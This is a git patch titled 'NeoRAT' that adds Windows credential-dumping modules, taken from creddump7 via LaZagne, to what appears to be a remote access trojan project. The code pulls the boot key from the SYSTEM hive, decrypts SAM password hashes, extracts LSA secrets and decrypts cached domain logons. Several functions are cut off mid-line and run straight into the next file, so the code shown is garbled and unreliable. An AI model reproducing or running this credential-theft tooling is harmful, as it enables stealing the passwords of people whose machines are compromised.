From 20dbeb2f38684c65ff0a4b99012c161295708e88 Mon Sep 17 00:00:00 2001 From: AL-LCL Date: Fri, 19 May 2023 11:01:49 +0200 Subject: NeoRAT --- .../softwares/windows/creddump7/win32/__init__.py | 0 .../windows/creddump7/win32/domcachedump.py | 146 ++++++++++ .../softwares/windows/creddump7/win32/hashdump.py | 298 +++++++++++++++++++++ .../windows/creddump7/win32/lsasecrets.py | 183 +++++++++++++ .../softwares/windows/creddump7/win32/rawreg.py | 81 ++++++ 5 files changed, 708 insertions(+) create mode 100644 foreign/client_handling/lazagne/softwares/windows/creddump7/win32/__init__.py create mode 100644 foreign/client_handling/lazagne/softwares/windows/creddump7/win32/domcachedump.py create mode 100644 foreign/client_handling/lazagne/softwares/windows/creddump7/win32/hashdump.py create mode 100644 foreign/client_handling/lazagne/softwares/windows/creddump7/win32/lsasecrets.py create mode 100644 foreign/client_handling/lazagne/softwares/windows/creddump7/win32/rawreg.py (limited to 'foreign/client_handling/lazagne/softwares/windows/creddump7/win32') diff --git a/foreign/client_handling/lazagne/softwares/windows/creddump7/win32/__init__.py b/foreign/client_handling/lazagne/softwares/windows/creddump7/win32/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/foreign/client_handling/lazagne/softwares/windows/creddump7/win32/domcachedump.py b/foreign/client_handling/lazagne/softwares/windows/creddump7/win32/domcachedump.py new file mode 100644 index 0000000..983c81a --- /dev/null +++ b/foreign/client_handling/lazagne/softwares/windows/creddump7/win32/domcachedump.py @@ -0,0 +1,146 @@ +# This file is part of creddump. +# +# creddump is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# +# creddump is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with creddump. If not, see . + +""" +@author: Brendan Dolan-Gavitt +@license: GNU General Public License 2.0 or later +@contact: bdolangavitt@wesleyan.edu +""" + +import hmac +import hashlib + +from .rawreg import * +from ..addrspace import HiveFileAddressSpace +from .hashdump import get_bootkey +from .lsasecrets import get_secret_by_name, get_lsa_key +from struct import unpack + +from foreign.client_handling.lazagne.config.crypto.pyaes.aes import AESModeOfOperationCBC +from foreign.client_handling.lazagne.config.crypto.rc4 import RC4 + +AES_BLOCK_SIZE = 16 + + +def get_nlkm(secaddr, lsakey, vista): + return get_secret_by_name(secaddr, 'NL$KM', lsakey, vista) + + +def decrypt_hash(edata, nlkm, ch): + hmac_md5 = hmac.new(nlkm, ch, hashlib.md5) + rc4key = hmac_md5.digest() + + rc4 = RC4(rc4key) + data = rc4.encrypt(edata) + return data + + +def decrypt_hash_vista(edata, nlkm, ch): + """ + Based on code from http://lab.mediaservice.net/code/cachedump.rb + """ + aes = AESModeOfOperationCBC(nlkm[16:32], iv=ch) + + out = "" + for i in range(0, len(edata), 16): + buf = edata[i:i+16] + if len(buf) < 16: + buf += (16 - len(buf)) * "\00" + out += b"".join([aes.decrypt(buf[i:i + AES_BLOCK_SIZE]) for i in range(0, len(buf), AES_BLOCK_SIZE)]) + return out + + +def parse_cache_entry(cache_data): + (uname_len, domain_len) = unpack(". + +""" +@author: Brendan Dolan-Gavitt +@license: GNU General Public License 2.0 or later +@contact: bdolangavitt@wesleyan.edu +""" + +import hashlib +import codecs +from struct import pack + +from ..addrspace import HiveFileAddressSpace +from .rawreg import * +from foreign.client_handling.lazagne.config.crypto.rc4 import RC4 +from foreign.client_handling.lazagne.config.crypto.pyDes import des, ECB +from foreign.client_handling.lazagne.config.crypto.pyaes.aes import AESModeOfOperationCBC +from foreign.client_handling.lazagne.config.winstructure import char_to_int, chr_or_byte, int_or_bytes + + +odd_parity = [ + 1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14, + 16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31, + 32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47, + 49, 49, 50, 50, 52, 52, 55, 55, 56, 56, 59, 59, 61, 61, 62, 62, + 64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79, + 81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91, 91, 93, 93, 94, 94, + 97, 97, 98, 98, 100, 100, 103, 103, 104, 104, 107, 107, 109, 109, 110, 110, + 112, 112, 115, 115, 117, 117, 118, 118, 121, 121, 122, 122, 124, 124, 127, 127, + 128, 128, 131, 131, 133, 133, 134, 134, 137, 137, 138, 138, 140, 140, 143, 143, + 145, 145, 146, 146, 148, 148, 151, 151, 152, 152, 155, 155, 157, 157, 158, 158, + 161, 161, 162, 162, 164, 164, 167, 167, 168, 168, 171, 171, 173, 173, 174, 174, + 176, 176, 179, 179, 181, 181, 182, 182, 185, 185, 186, 186, 188, 188, 191, 191, + 193, 193, 194, 194, 196, 196, 199, 199, 200, 200, 203, 203, 205, 205, 206, 206, + 208, 208, 211, 211, 213, 213, 214, 214, 217, 217, 218, 218, 220, 220, 223, 223, + 224, 224, 227, 227, 229, 229, 230, 230, 233, 233, 234, 234, 236, 236, 239, 239, + 241, 241, 242, 242, 244, 244, 247, 247, 248, 248, 251, 251, 253, 253, 254, 254 +] + +# Permutation matrix for boot key +p = [0x8, 0x5, 0x4, 0x2, 0xb, 0x9, 0xd, 0x3, + 0x0, 0x6, 0x1, 0xc, 0xe, 0xa, 0xf, 0x7] + +# Constants for SAM decrypt algorithm +aqwerty = b"!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%\0" +anum = b"0123456789012345678901234567890123456789\0" +antpassword = b"NTPASSWORD\0" +almpassword = b"LMPASSWORD\0" + +empty_lm = codecs.decode('aad3b435b51404eeaad3b435b51404ee', 'hex') +empty_nt = codecs.decode('31d6cfe0d16ae931b73c59d7e0c089c0', 'hex') + +AES_BLOCK_SIZE = 16 + + +def str_to_key(s): + key = [] + key.append(char_to_int(s[0]) >> 1) + key.append(((char_to_int(s[0]) & 0x01) << 6) | (char_to_int(s[1]) >> 2)) + key.append(((char_to_int(s[1]) & 0x03) << 5) | (char_to_int(s[2]) >> 3)) + key.append(((char_to_int(s[2]) & 0x07) << 4) | (char_to_int(s[3]) >> 4)) + key.append(((char_to_int(s[3]) & 0x0F) << 3) | (char_to_int(s[4]) >> 5)) + key.append(((char_to_int(s[4]) & 0x1F) << 2) | (char_to_int(s[5]) >> 6)) + key.append(((char_to_int(s[5]) & 0x3F) << 1) | (char_to_int(s[6]) >> 7)) + key.append(char_to_int(s[6]) & 0x7F) + + for i in range(8): + key[i] = (key[i] << 1) + key[i] = odd_parity[key[i]] + + return b"".join(chr_or_byte(k) for k in key) + + +def sid_to_key(sid): + s1 = b"" + s1 += chr_or_byte(sid & 0xFF) + s1 += chr_or_byte((sid >> 8) & 0xFF) + s1 += chr_or_byte((sid >> 16) & 0xFF) + s1 += chr_or_byte((sid >> 24) & 0xFF) + s1 += int_or_bytes(s1[0]) + s1 += int_or_bytes(s1[1]) + s1 += int_or_bytes(s1[2]) + s2 = int_or_bytes(s1[3]) + int_or_bytes(s1[0]) + int_or_bytes(s1[1]) + int_or_bytes(s1[2]) + s2 += int_or_bytes(s2[0]) + int_or_bytes(s2[1]) + int_or_bytes(s2[2]) + return str_to_key(s1), str_to_key(s2) + + +def find_control_set(sysaddr): + root = get_root(sysaddr) + if not root: + return 1 + + csselect = open_key(root, [b"Select"]) + if not csselect: + return 1 + + for v in values(csselect): + if v.Name == b"Current": + return v.Data.value + + +def get_bootkey(sysaddr): + cs = find_control_set(sysaddr) + lsa_base = [b"ControlSet%03d" % cs, b"Control", b"Lsa"] + lsa_keys = [b"JD", b"Skew1", b"GBG", b"Data"] + + root = get_root(sysaddr) + if not root: + return None + + lsa = open_key(root, lsa_base) + if not lsa: + return None + + bootkey = b"" + + for lk in lsa_keys: + key = open_key(lsa, [lk]) + class_data = sysaddr.read(key.Class.value, key.ClassLength.value) + bootkey += codecs.decode(class_data.decode('utf-16-le'), 'hex') + + bootkey_scrambled = b"" + for i in range(len(bootkey)): + try: + bootkey_scrambled += bootkey[p[i]] + except TypeError: + bootkey_scrambled += bytes([bootkey[p[i]]]) + return bootkey_scrambled + + +def get_hbootkey(samaddr, bootkey): + sam_account_path = [b"SAM", b"Domains", b"Account"] + + root = get_root(samaddr) + if not root: + return None + + sam_account_key = open_key(root, sam_account_path) + if not sam_account_key: + return None + + F = None + for v in values(sam_account_key): + if v.Name == b'F': + F = samaddr.read(v.Data.value, v.DataLength.value) + if not F: + return None + + revision = ord(F[0x00]) + if revision == 2: + md5 = hashlib.md5(F[0x70:0x80] + aqwerty + bootkey + anum) + rc4_key = md5.digest() + rc4 = RC4(rc4_key) + hbootkey = rc4.encrypt(F[0x80:0xA0]) + + return hbootkey + + elif revision == 3: + iv = F[0x78:0x88] + encryptedHBootKey = F[0x88:0xA8] + cipher = AESModeOfOperationCBC(bootkey, iv=iv) + hbootkey = b"".join([cipher.decrypt(encryptedHBootKey[i:i + AES_BLOCK_SIZE]) for i in range(0, len(encryptedHBootKey), AES_BLOCK_SIZE)]) + + return hbootkey[:16] + + +def get_user_keys(samaddr): + user_key_path = [b"SAM", b"Domains", b"Account", b"Users"] + root = get_root(samaddr) + if not root: + return [] + + user_key = open_key(root, user_key_path) + if not user_key: + return [] + + return [k for k in subkeys(user_key) if k.Name != b"Names"] + + +def decrypt_single_hash(rid, hbootkey, enc_hash, lmntstr): + if enc_hash == "": + return "" + (des_k1, des_k2) = sid_to_key(rid) + d1 = des(des_k1, ECB) + d2 = des(des_k2, ECB) + md5 = hashlib.md5() + md5.update(hbootkey[:0x10] + pack(". + +""" +@author: Brendan Dolan-Gavitt +@license: GNU General Public License 2.0 or later +@contact: bdolangavitt@wesleyan.edu +""" + +import hashlib +import os + +from .rawreg import * +from ..addrspace import HiveFileAddressSpace +from .hashdump import get_bootkey, str_to_key +from foreign.client_handling.lazagne.config.crypto.rc4 import RC4 +from foreign.client_handling.lazagne.config.crypto.pyDes import des, ECB +from foreign.client_handling.lazagne.config.crypto.pyaes.aes import AESModeOfOperationCBC + + +def get_lsa_key(secaddr, bootkey, vista): + root = get_root(secaddr) + if not root: + return None + + if vista: + enc_reg_key = open_key(root, [b"Policy", b"PolEKList"]) + else: + enc_reg_key = open_key(root, [b"Policy", b"PolSecretEncryptionKey"]) + + if not enc_reg_key: + return None + + enc_reg_value = enc_reg_key.ValueList.List[0] + if not enc_reg_value: + return None + + obf_lsa_key = secaddr.read(enc_reg_value.Data.value, enc_reg_value.DataLength.value) + if not obf_lsa_key: + return None + + if not vista: + md5 = hashlib.md5() + md5.update(bootkey) + for i in range(1000): + md5.update(obf_lsa_key[60:76]) + rc4key = md5.digest() + rc4 = RC4(rc4key) + lsa_key = rc4.encrypt(obf_lsa_key[12:60]) + lsa_key = lsa_key[0x10:0x20] + else: + lsa_key = decrypt_aes(obf_lsa_key, bootkey) + lsa_key = lsa_key[68:100] + + return lsa_key + + +def decrypt_secret(secret, key): + """Python implementation of SystemFunction005. + + Decrypts a block of data with DES using given key. + Note that key can be longer than 7 bytes.""" + decrypted_data = b'' + j = 0 # key index + for i in range(0, len(secret), 8): + enc_block = secret[i:i + 8] + block_key = key[j:j + 7] + des_key = str_to_key(block_key) + crypter = des(des_key, ECB) + + try: + decrypted_data += crypter.decrypt(enc_block) + except Exception: + continue + + j += 7 + if len(key[j:j + 7]) < 7: + j = len(key[j:j + 7]) + + (dec_data_len,) = unpack(". + +""" +@author: Brendan Dolan-Gavitt +@license: GNU General Public License 2.0 or later +@contact: bdolangavitt@wesleyan.edu +""" + +from ..newobj import Obj, Pointer +from struct import unpack + +ROOT_INDEX = 0x20 +LH_SIG = unpack("